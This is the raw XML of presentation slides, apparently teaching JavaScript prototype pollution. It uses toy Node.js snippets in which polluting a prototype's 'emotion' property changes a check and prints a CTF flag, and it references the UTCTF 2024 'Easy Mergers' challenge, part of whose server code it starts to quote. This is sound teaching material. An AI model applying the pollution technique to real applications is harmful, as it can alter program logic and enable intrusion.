                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D6AADD7-CFAD-AA4A-2B41-B1076DF20CF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5908334" y="3370969"/>
              <a:ext cx="2163237" cy="637032"/>
              <a:chOff x="5908334" y="3370969"/>
              <a:chExt cx="2163237" cy="637032"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Picture 5" descr="A yellow cat with black eyes&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{493B8A68-ECE9-BAC9-236A-71618767653B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5908334" y="3370969"/>
                <a:ext cx="627075" cy="627075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="Picture 7" descr="A yellow cat with black eyes&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87BD162C-664D-54DD-4140-D39AA3985C76}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7444496" y="3380926"/>
                <a:ext cx="627075" cy="627075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="12" name="Connector: Curved 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1B4A012-54D9-71F4-A419-6238E0729BA2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="6" idx="3"/>
                <a:endCxn id="8" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6535409" y="3684507"/>
                <a:ext cx="909087" cy="99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0B5BCD9-2606-156A-B3FA-566AE3770BE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5812768" y="4299575"/>
              <a:ext cx="2319238" cy="741850"/>
              <a:chOff x="5812768" y="4299575"/>
              <a:chExt cx="2319238" cy="741850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Picture 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72FDDF70-A036-B310-BE86-2D1E74D01090}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7384060" y="4299576"/>
                <a:ext cx="747946" cy="741849"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="Picture 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00629922-2176-2AB7-6139-6A5A9A58BEA5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5812768" y="4299575"/>
                <a:ext cx="747946" cy="741849"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="Connector: Curved 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB1035F-59EE-24E2-6E82-7442444030AF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="10" idx="3"/>
                <a:endCxn id="7" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6560714" y="4670500"/>
                <a:ext cx="823346"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04287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B48B-AADA-AD79-379B-815AF3DB100E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The why 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40CF1459-E977-8D32-CFF0-CB8B37AA3267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Similar toy example, but fails due to the property being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>present on the original object already</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</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Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</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a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>make_me_angery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </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const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>emotion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"love"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat.emotion</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angery</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console.log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"flag{:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcatangery</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undefined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434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>make_me_angery</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undefined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.prototype.emotion</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>angery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>angery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</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err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>make_me_angery</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undefined</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978FBF8F-BE6C-15F3-ED7A-51A2773D5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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1AA7D5-6183-5DE2-68BE-5266019656C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2839275" y="3264303"/>
            <a:ext cx="3148801" cy="1930739"/>
            <a:chOff x="2839275" y="3264303"/>
            <a:chExt cx="3148801" cy="1930739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="Group 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D56E06E-D5E1-0221-E159-07C51CEFD0D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2915752" y="3264303"/>
              <a:ext cx="2163237" cy="637032"/>
              <a:chOff x="5908334" y="3599748"/>
              <a:chExt cx="2163237" cy="637032"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Picture 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0CF9D19-FB79-8C85-485E-05783FBDF238}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5908334" y="3599748"/>
                <a:ext cx="627075" cy="627075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Picture 6" descr="A yellow cat with black eyes&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1568DB1-C25A-084A-47D1-2A809B365E80}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7444496" y="3609705"/>
                <a:ext cx="627075" cy="627075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="10" name="Connector: Curved 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7C7E4C-566D-D5FE-1691-38FED8998BE1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="5" idx="3"/>
                <a:endCxn id="7" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6535409" y="3913286"/>
                <a:ext cx="909087" cy="99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9D15AFE-76BA-A9F4-BC51-95105EE554E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2839275" y="4159790"/>
              <a:ext cx="2316190" cy="741850"/>
              <a:chOff x="5815816" y="4147784"/>
              <a:chExt cx="2316190" cy="741850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Picture 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{739752D2-D4FF-6DAD-97CA-A6F647D7D6B5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7384060" y="4147785"/>
                <a:ext cx="747946" cy="741849"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="Picture 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A21B1ED-A6B4-84A0-288A-E0D64800410C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5815816" y="4147784"/>
                <a:ext cx="741849" cy="741849"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="11" name="Connector: Curved 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8557AF-D47E-8694-F518-DBFD729A87C4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="9" idx="3"/>
                <a:endCxn id="6" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6560714" y="4518709"/>
                <a:ext cx="823346" cy="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4E6FBF5-7F2E-06DD-11E0-CE6D6B83B6B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5230865" y="3486272"/>
              <a:ext cx="757211" cy="1708770"/>
              <a:chOff x="5230865" y="3486272"/>
              <a:chExt cx="757211" cy="1708770"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="Picture 7" descr="A yellow cat with a wrench&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4175282D-BBD2-0BB6-4504-CA49C9D6BBD3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5246227" y="3486272"/>
                <a:ext cx="741849" cy="741849"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Picture 12" descr="A yellow cat with black eyes and whiskers&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5DAC205-D40A-D7DE-E6F7-464DD2E6B97F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="5230865" y="4463355"/>
                <a:ext cx="731687" cy="731687"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2320835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B48B-AADA-AD79-379B-815AF3DB100E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The why 3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40CF1459-E977-8D32-CFF0-CB8B37AA3267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>A CTF example (UTCTF 2024/Easy Mergers) with a writeup: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeup/39045</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0">
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> secret = {}</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process.on</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'message'</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function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (m) </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fires when a HTTP request occurs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
